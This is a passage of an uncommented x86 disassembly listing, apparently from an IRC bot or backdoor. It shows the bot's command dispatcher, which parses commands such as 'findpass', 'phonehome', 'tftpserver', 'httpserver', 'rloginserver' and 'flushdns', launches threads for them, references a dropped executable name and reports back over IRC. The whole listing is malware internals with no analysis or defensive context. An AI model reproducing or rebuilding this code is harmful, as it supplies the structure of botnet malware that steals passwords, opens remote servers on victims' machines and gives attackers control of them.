test eax, eax
pop ecx
jz loc_403F1A
push edi ; Str2
push offset aFlusharp ; "flusharp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F03
push edi ; Str2
push offset aFarp ; "farp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403F03
push edi ; Str2
push offset aFlushdns ; "flushdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403ECB
push edi ; Str2
push offset aFdns ; "fdns"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403ECB
push edi ; Str2
push offset aCurrentip ; "currentip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403E91
push edi ; Str2
push offset aCip ; "cip"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403E91
push edi ; Str2
push offset aRloginserver ; "rloginserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403D56
push edi ; Str2
push offset aRlogin ; "rlogin"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403D56
push edi ; Str2
push offset aHttpserver ; "httpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403BCA
push edi ; Str2
push offset aHttp ; "http"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403BCA
push edi ; Str2
push offset aTftpserver ; "tftpserver"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403A90
push edi ; Str2
push offset aTftp ; "tftp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403A90
push edi ; Str2
push offset aShitycrash ; "shitycrash"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_403653
lea eax, [ebp+Dst]
push offset unk_42C444 ; Format
push eax ; Dest
call _sprintf
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_403632
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_403632: ; CODE XREF: sub_401ACD+1B47�j
lea eax, [ebp+Dst]
push eax ; Str2
call sub_415D38
mov [esp+569Ch+var_569C], offset aShitycrash ; "shitycrash"
push [ebp+esi+var_7C] ; Str1
call _strcmp
jmp loc_4097D0
; ---------------------------------------------------------------------------
loc_403653: ; CODE XREF: sub_401ACD+1B2F�j
push edi ; Str2
push offset aAsc ; "asc"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403789
push edi ; Str2
push offset aAs ; "as"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_403789
push edi ; Str2
push offset aPhonehome ; "phonehome"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4036AA
lea eax, [ebp+var_C4]
push eax ; Args
push offset aNoticeSPhoning ; "NOTICE %s :PHONING HOME: DADI Are You T"...
push [ebp+arg_4] ; int
call sub_409823
loc_4036A2: ; CODE XREF: sub_401ACD+47B�j
add esp, 0Ch
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4036AA: ; CODE XREF: sub_401ACD+1BBF�j
push edi ; Str2
push offset aFindpass ; "findpass"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_4036D0
push edi ; Str2
push offset aFp ; "fp"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_403446
loc_4036D0: ; CODE XREF: sub_401ACD+1BEC�j
push [ebp+Format] ; Format
lea eax, [ebp+var_FEC]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_FF0], eax
mov eax, [ebp+var_4]
mov [ebp+var_F68], eax
mov eax, [ebp+var_8]
mov [ebp+var_F64], eax
push offset asc_42C3C4 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 26h ; int
push eax ; Source
call sub_40B3BA
add esp, 18h
mov [ebp+var_F6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FF0]
push ebx
push eax
push offset sub_4172C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_F6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403778
loc_403762: ; CODE XREF: sub_401ACD+1CA9�j
cmp [ebp+var_F60], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403762
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_401ACD+1C93�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C388
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_403789: ; CODE XREF: sub_401ACD+1B95�j
; sub_401ACD+1BAA�j
mov al, byte_4319DA
mov [ebp+Src], ebx
cmp al, bl
mov edx, offset byte_4319DA
jz loc_401F75
mov ecx, edx
loc_4037A0: ; CODE XREF: sub_401ACD+1CDB�j
inc [ebp+Src]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4037A0
cmp al, bl
jz loc_401F75
mov [ebp+arg_18], edx
loc_4037B5: ; CODE XREF: sub_401ACD+1FAE�j
push 0Bh
call sub_40B602
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+Src]
mov edx, eax
mov eax, 320h
add edx, ecx
cmp edx, eax
jle short loc_403808
push ecx
lea eax, [ebp+Dst]
push offset asc_42C34C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 20h
jmp loc_403A72
; ---------------------------------------------------------------------------
loc_403808: ; CODE XREF: sub_401ACD+1D06�j
or [ebp+var_730], 0FFFFFFFFh
cmp dword_4317F8, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], eax
mov [ebp+Src], ebx
jz short loc_403875
mov eax, [ebp+arg_18]
mov esi, offset dword_4317F8
lea edi, [eax-0Ah]
loc_40383F: ; CODE XREF: sub_401ACD+1D8A�j
lea eax, [esi-28h]
push edi ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40385B
inc [ebp+Src]
add esi, 40h
cmp [esi], ebx
jnz short loc_40383F
jmp short loc_403875
; ---------------------------------------------------------------------------
loc_40385B: ; CODE XREF: sub_401ACD+1D80�j
mov eax, [ebp+Src]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, dword_4317F8[ecx]
mov [ebp+var_74C], ecx
loc_403875: ; CODE XREF: sub_401ACD+1D65�j
; sub_401ACD+1D8C�j
cmp [ebp+var_74C], ebx
jz loc_403A86
push 10h
lea eax, [ebp+var_2D4]
pop esi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2D4], esi
push [ebp+arg_4]
call dword_4CB978 ; getsockname
mov al, [ebp+var_8FF]
push esi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+Count], eax
push [ebp+Count] ; Count
call dword_4CBA60 ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_860]
push eax ; Dest
call _strncpy
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_860]
push eax ; Str
call _strrchr
add esp, 14h
cmp esi, ebx
mov byte ptr [ebp+File+3], bl
jle short loc_40391D
loc_4038FB: ; CODE XREF: sub_401ACD+1E4E�j
cmp eax, ebx
jz short loc_40391D
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, esi
jl short loc_4038FB
loc_40391D: ; CODE XREF: sub_401ACD+1E2C�j
; sub_401ACD+1E30�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov esi, [ebp+var_4]
mov edi, [ebp+var_8]
mov [ebp+var_750], eax
lea eax, [ebp+var_850]
push 80h ; Count
push eax ; Dest
mov [ebp+var_720], 1
mov [ebp+var_728], esi
mov [ebp+var_724], edi
call __snprintf
push offset byte_43DB88 ; Str2
push offset aF ; "#f"
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40398A
push offset aF ; "#f"
lea eax, [ebp+var_7D0]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403990
; ---------------------------------------------------------------------------
loc_40398A: ; CODE XREF: sub_401ACD+1EA0�j
mov [ebp+var_7D0], bl
loc_403990: ; CODE XREF: sub_401ACD+1EBB�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4039A2
mov eax, offset aSequential ; "Sequential"
loc_4039A2: ; CODE XREF: sub_401ACD+1ECE�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42C2CC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40C600
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403A2C
loc_403A1A: ; CODE XREF: sub_401ACD+1F5D�j
cmp [ebp+var_71C], ebx
jnz short loc_403A47
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403A1A
; ---------------------------------------------------------------------------
loc_403A2C: ; CODE XREF: sub_401ACD+1F4B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_42C290 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403A47: ; CODE XREF: sub_401ACD+1F53�j
cmp edi, ebx
jnz short loc_403A65
push ebx ; int
lea eax, [ebp+Dst]
push esi ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_403A65: ; CODE XREF: sub_401ACD+1F7C�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
pop ecx
loc_403A72: ; CODE XREF: sub_401ACD+1D36�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_4037B5
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_403A86: ; CODE XREF: sub_401ACD+1DAE�j
push offset unk_42C258
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_403A90: ; CODE XREF: sub_401ACD+1B05�j
; sub_401ACD+1B1A�j
push 5
call sub_40B602
test eax, eax
pop ecx
jle short loc_403AA6
push offset unk_42C238
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_403AA6: ; CODE XREF: sub_401ACD+1FCD�j
mov eax, dword ptr [ebp+esi+Args]
cmp eax, ebx
jz short loc_403AC9
push eax ; Format
mov edi, 104h
lea eax, [ebp+var_2D54]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_403ADD
; ---------------------------------------------------------------------------
loc_403AC9: ; CODE XREF: sub_401ACD+1FE2�j
mov edi, 104h
lea eax, [ebp+var_2D54]
push edi
push eax
push ebx
call ds:dword_427078 ; GetModuleFileNameA
loc_403ADD: ; CODE XREF: sub_401ACD+1FFA�j
mov esi, [ebp+esi+Format]
cmp esi, ebx
jnz short loc_403AED
mov esi, offset Str ; "fgezpzzi.exe"
loc_403AED: ; CODE XREF: sub_401ACD+2019�j
push esi ; Format
lea eax, [ebp+var_2C50]
push edi ; Count
push eax ; Dest
call __snprintf
mov eax, dword_429078
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2B44], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B48], ebx
mov [ebp+var_2D58], eax
lea eax, [ebp+var_2B40]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_2AC0], eax
mov eax, [ebp+var_8]
mov [ebp+var_2ABC], eax
lea eax, [ebp+var_2D54]
push eax
lea eax, [ebp+Dst]
push [ebp+var_2B44]
push offset asc_42C204 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 5 ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_2B4C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D58]
push ebx
push eax
push offset sub_412197
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2B4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403BB9
loc_403BA3: ; CODE XREF: sub_401ACD+20EA�j
cmp [ebp+var_2AB8], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403BA3
; ---------------------------------------------------------------------------
loc_403BB9: ; CODE XREF: sub_401ACD+20D4�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C1C8
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_403BCA: ; CODE XREF: sub_401ACD+1ADB�j
; sub_401ACD+1AF0�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403BE9
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403BE9
push edi ; Str
call _atoi
pop ecx
jmp short loc_403BEE
; ---------------------------------------------------------------------------
loc_403BE9: ; CODE XREF: sub_401ACD+2106�j
; sub_401ACD+2111�j
mov eax, dword_42907C
loc_403BEE: ; CODE XREF: sub_401ACD+211A�j
mov esi, [ebp+esi+Format]
mov [ebp+var_36CC], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B8], eax
jz short loc_403C21
lea eax, [ebp+var_37D0]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_403C4C
; ---------------------------------------------------------------------------
loc_403C21: ; CODE XREF: sub_401ACD+2141�j
lea eax, [ebp+FullPath]
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
add esp, 14h
loc_403C4C: ; CODE XREF: sub_401ACD+2152�j
lea eax, [ebp+var_37D0]
push eax ; Str
call _strlen
cmp [ebp+eax+var_37D1], 5Ch
pop ecx
jnz short loc_403C77
lea eax, [ebp+var_37D0]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_37D1], bl
loc_403C77: ; CODE XREF: sub_401ACD+2194�j
push [ebp+Format] ; Format
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A58]
mov [ebp+var_3A5C], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36BC], eax
lea eax, [ebp+var_37D0]
mov [ebp+var_36C0], edi
push eax
push [ebp+var_36CC]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42C18C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 3 ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_36C4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A5C]
push ebx
push eax
push offset sub_40FAD6
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_36C4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403D2B
loc_403D19: ; CODE XREF: sub_401ACD+225C�j
cmp [ebp+var_36B0], ebx
jnz short loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403D19
; ---------------------------------------------------------------------------
loc_403D2B: ; CODE XREF: sub_401ACD+224A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset asc_42C150 ; "-"
loc_403D37: ; CODE XREF: sub_401ACD+23BF�j
; sub_401ACD+4BDC�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_403D46: ; CODE XREF: sub_401ACD+2252�j
; sub_401ACD+23A3�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx
push edi
jmp loc_4071A3
; ---------------------------------------------------------------------------
loc_403D56: ; CODE XREF: sub_401ACD+1AB1�j
; sub_401ACD+1AC6�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_403D75
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_403D75
push edi ; Str
call _atoi
pop ecx
jmp short loc_403D7A
; ---------------------------------------------------------------------------
loc_403D75: ; CODE XREF: sub_401ACD+2292�j
; sub_401ACD+229D�j
mov eax, dword_429080
loc_403D7A: ; CODE XREF: sub_401ACD+22A6�j
mov [ebp+var_1828], eax
mov eax, [ebp+esi+Format]
cmp eax, ebx
jnz short loc_403D91
lea eax, [ebp+var_C4]
loc_403D91: ; CODE XREF: sub_401ACD+22BC�j
push eax ; Format
lea eax, [ebp+var_1968]
push 40h ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+Str2]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403DB3
mov esi, offset byte_43DB88
loc_403DB3: ; CODE XREF: sub_401ACD+22DF�j
push esi ; Format
lea eax, [ebp+var_1928]
push 100h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
lea eax, [ebp+var_19E8]
push [ebp+Format] ; Format
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1814], eax
lea eax, [ebp+var_1968]
push eax
mov [ebp+var_19EC], esi
push [ebp+var_1828]
mov [ebp+var_1818], edi
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42C114 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 9 ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_1824], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19EC]
push ebx
push eax
push offset sub_41144E
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1824]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403E80
loc_403E6A: ; CODE XREF: sub_401ACD+23B1�j
cmp [ebp+var_1810], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403E6A
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_401ACD+239B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C0D8
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_403E91: ; CODE XREF: sub_401ACD+1A87�j
; sub_401ACD+1A9C�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_403EA4
push esi ; Str
call _atoi
jmp short loc_403EAB
; ---------------------------------------------------------------------------
loc_403EA4: ; CODE XREF: sub_401ACD+23CD�j
push 0Bh
call sub_40B621
loc_403EAB: ; CODE XREF: sub_401ACD+23D5�j
cmp eax, ebx
pop ecx
jz loc_409644
push eax ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40BD1A
jmp loc_404376
; ---------------------------------------------------------------------------
loc_403ECB: ; CODE XREF: sub_401ACD+1A5D�j
; sub_401ACD+1A72�j
mov eax, dword_4CB8F0
cmp eax, ebx
jz short loc_403EE8
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_403EE1
push offset unk_42C0B4
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403EE1: ; CODE XREF: sub_401ACD+240B�j
push offset unk_42C088
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403EE8: ; CODE XREF: sub_401ACD+2405�j
push offset asc_42C05C ; "-"
loc_403EED: ; CODE XREF: sub_401ACD+2412�j
; sub_401ACD+2419�j ...
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_406BFB
; ---------------------------------------------------------------------------
loc_403F03: ; CODE XREF: sub_401ACD+1A33�j
; sub_401ACD+1A48�j
call sub_40A928
test eax, eax
jz short loc_403F13
push offset unk_42C038
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403F13: ; CODE XREF: sub_401ACD+243D�j
push offset unk_42C00C
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403F1A: ; CODE XREF: sub_401ACD+1A09�j
; sub_401ACD+1A1E�j
cmp [ebp+var_8], ebx
jnz short loc_403F39
push ebx ; int
push [ebp+var_4] ; int
push offset dword_42BFF4 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_403F39: ; CODE XREF: sub_401ACD+2450�j
push ebx ; int
push [ebp+var_4] ; int
call sub_418723
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
push offset unk_42BFD8
jmp loc_40423F
; ---------------------------------------------------------------------------
loc_403F5B: ; CODE XREF: sub_401ACD+18A0�j
; sub_401ACD+18B5�j
push 0Ah
call sub_40B602
test eax, eax
pop ecx
jle short loc_403F6E
push offset unk_42BFAC
jmp short loc_403F8F
; ---------------------------------------------------------------------------
loc_403F6E: ; CODE XREF: sub_401ACD+2498�j
push [ebp+Format]
push [ebp+arg_4]
call sub_41A1B1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_403F8A
push offset unk_42BF84
jmp short loc_403F8F
; ---------------------------------------------------------------------------
loc_403F8A: ; CODE XREF: sub_401ACD+24B4�j
push offset asc_42BF64 ; "-"
loc_403F8F: ; CODE XREF: sub_401ACD+249F�j
; sub_401ACD+24BB�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_403F9D: ; CODE XREF: sub_401ACD+5781�j
cmp [ebp+var_8], ebx
jnz short loc_403FBE
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_403FB6: ; CODE XREF: sub_401ACD+6DA8�j
call sub_409869
add esp, 14h
loc_403FBE: ; CODE XREF: sub_401ACD+24D3�j
; sub_401ACD+26B0�j ...
lea eax, [ebp+Dst]
push eax
call sub_415D38
jmp loc_4097D1
; ---------------------------------------------------------------------------
loc_403FCF: ; CODE XREF: sub_401ACD+1876�j
; sub_401ACD+188B�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_40A5C5
jmp loc_404260
; ---------------------------------------------------------------------------
loc_403FE8: ; CODE XREF: sub_401ACD+184C�j
; sub_401ACD+1861�j
push dword ptr [ebp+esi+Args] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_416FCF
jmp loc_404260
; ---------------------------------------------------------------------------
loc_404005: ; CODE XREF: sub_401ACD+1822�j
; sub_401ACD+1837�j
or edi, 0FFFFFFFFh
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Src], eax
jz short loc_40402E
push esi ; Str
call _atoi
pop ecx
mov edi, eax
loc_40402E: ; CODE XREF: sub_401ACD+2556�j
mov eax, [ebp+Src]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_404047
cmp edi, 0FFFFFFFFh
jnz loc_409644
loc_404047: ; CODE XREF: sub_401ACD+256F�j
push ebx
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+Dst]
push offset unk_42BF4C ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
lea eax, [ebp+Dst]
push eax
call sub_415D38
loc_404085: ; CODE XREF: sub_401ACD+51BC�j
add esp, 24h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40408D: ; CODE XREF: sub_401ACD+17F8�j
; sub_401ACD+180D�j
push 27h
call sub_40B602
test eax, eax
pop ecx
jle short loc_4040BE
cmp [ebp+var_8], ebx
jnz loc_401F75
push ebx ; int
push [ebp+var_4] ; int
push offset unk_42BF2C ; int
loc_4040AB: ; CODE XREF: sub_401ACD+4F88�j
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
jmp loc_408C05
; ---------------------------------------------------------------------------
loc_4040BE: ; CODE XREF: sub_401ACD+25CA�j
push [ebp+Format] ; Format
lea eax, [ebp+var_BC4]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
mov esi, dword ptr [ebp+esi+Args]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
mov [ebp+var_B40], ebx
jz short loc_40411F
push esi ; Str2
push offset aFull ; "full"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40411F
mov [ebp+var_B40], 1
loc_40411F: ; CODE XREF: sub_401ACD+2635�j
; sub_401ACD+2646�j
lea eax, [ebp+Dst]
push offset asc_42BF08 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 27h ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_419E38
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40418D
loc_404177: ; CODE XREF: sub_401ACD+26BE�j
cmp [ebp+var_B34], ebx
jnz loc_403FBE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404177
; ---------------------------------------------------------------------------
loc_40418D: ; CODE XREF: sub_401ACD+26A8�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset asc_42BECC ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_403FBE
; ---------------------------------------------------------------------------
loc_4041AD: ; CODE XREF: sub_401ACD+17CE�j
; sub_401ACD+17E3�j
cmp [ebp+var_8], ebx
jnz short loc_4041CC
push ebx ; int
push [ebp+var_4] ; int
push offset unk_42BEB4 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 14h
loc_4041CC: ; CODE XREF: sub_401ACD+26E3�j
push [ebp+arg_4]
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
call sub_4188A6
push ebx
call ds:dword_42706C ; ExitProcess
loc_4041E7: ; CODE XREF: sub_401ACD+17A4�j
; sub_401ACD+17B9�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push eax
call sub_41AF8F
pop ecx
pop ecx
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
push offset unk_42BE9C
jmp short loc_40423F
; ---------------------------------------------------------------------------
loc_404212: ; CODE XREF: sub_401ACD+177A�j
; sub_401ACD+178F�j
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B243
add esp, 0Ch
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
push offset unk_42BE84
loc_40423F: ; CODE XREF: sub_401ACD+2489�j
; sub_401ACD+2743�j
call sub_415D38
add esp, 18h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40424C: ; CODE XREF: sub_401ACD+1750�j
; sub_401ACD+1765�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_415DD8
loc_404260: ; CODE XREF: sub_401ACD+3C8�j
; sub_401ACD+2516�j ...
add esp, 10h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_404268: ; CODE XREF: sub_401ACD+1726�j
; sub_401ACD+173B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1598], bl
jz short loc_4042A7
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_4042A7
push esi ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4042A7
push eax
push offset aS_6 ; "%s"
lea eax, [ebp+var_1598]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_4042A7: ; CODE XREF: sub_401ACD+27A4�j
; sub_401ACD+27AF�j ...
push [ebp+Format] ; Format
lea eax, [ebp+var_1618]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_161C], eax
mov eax, [ebp+var_4]
mov [ebp+var_1514], eax
mov eax, [ebp+var_8]
mov [ebp+var_1510], eax
lea eax, [ebp+Dst]
push offset asc_42BE6C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 25h ; int
push eax ; Source
call sub_40B3BA
add esp, 14h
mov [ebp+var_1518], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_161C]
push ebx
push eax
push offset sub_415E4B
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1518]
imul ecx, 234h
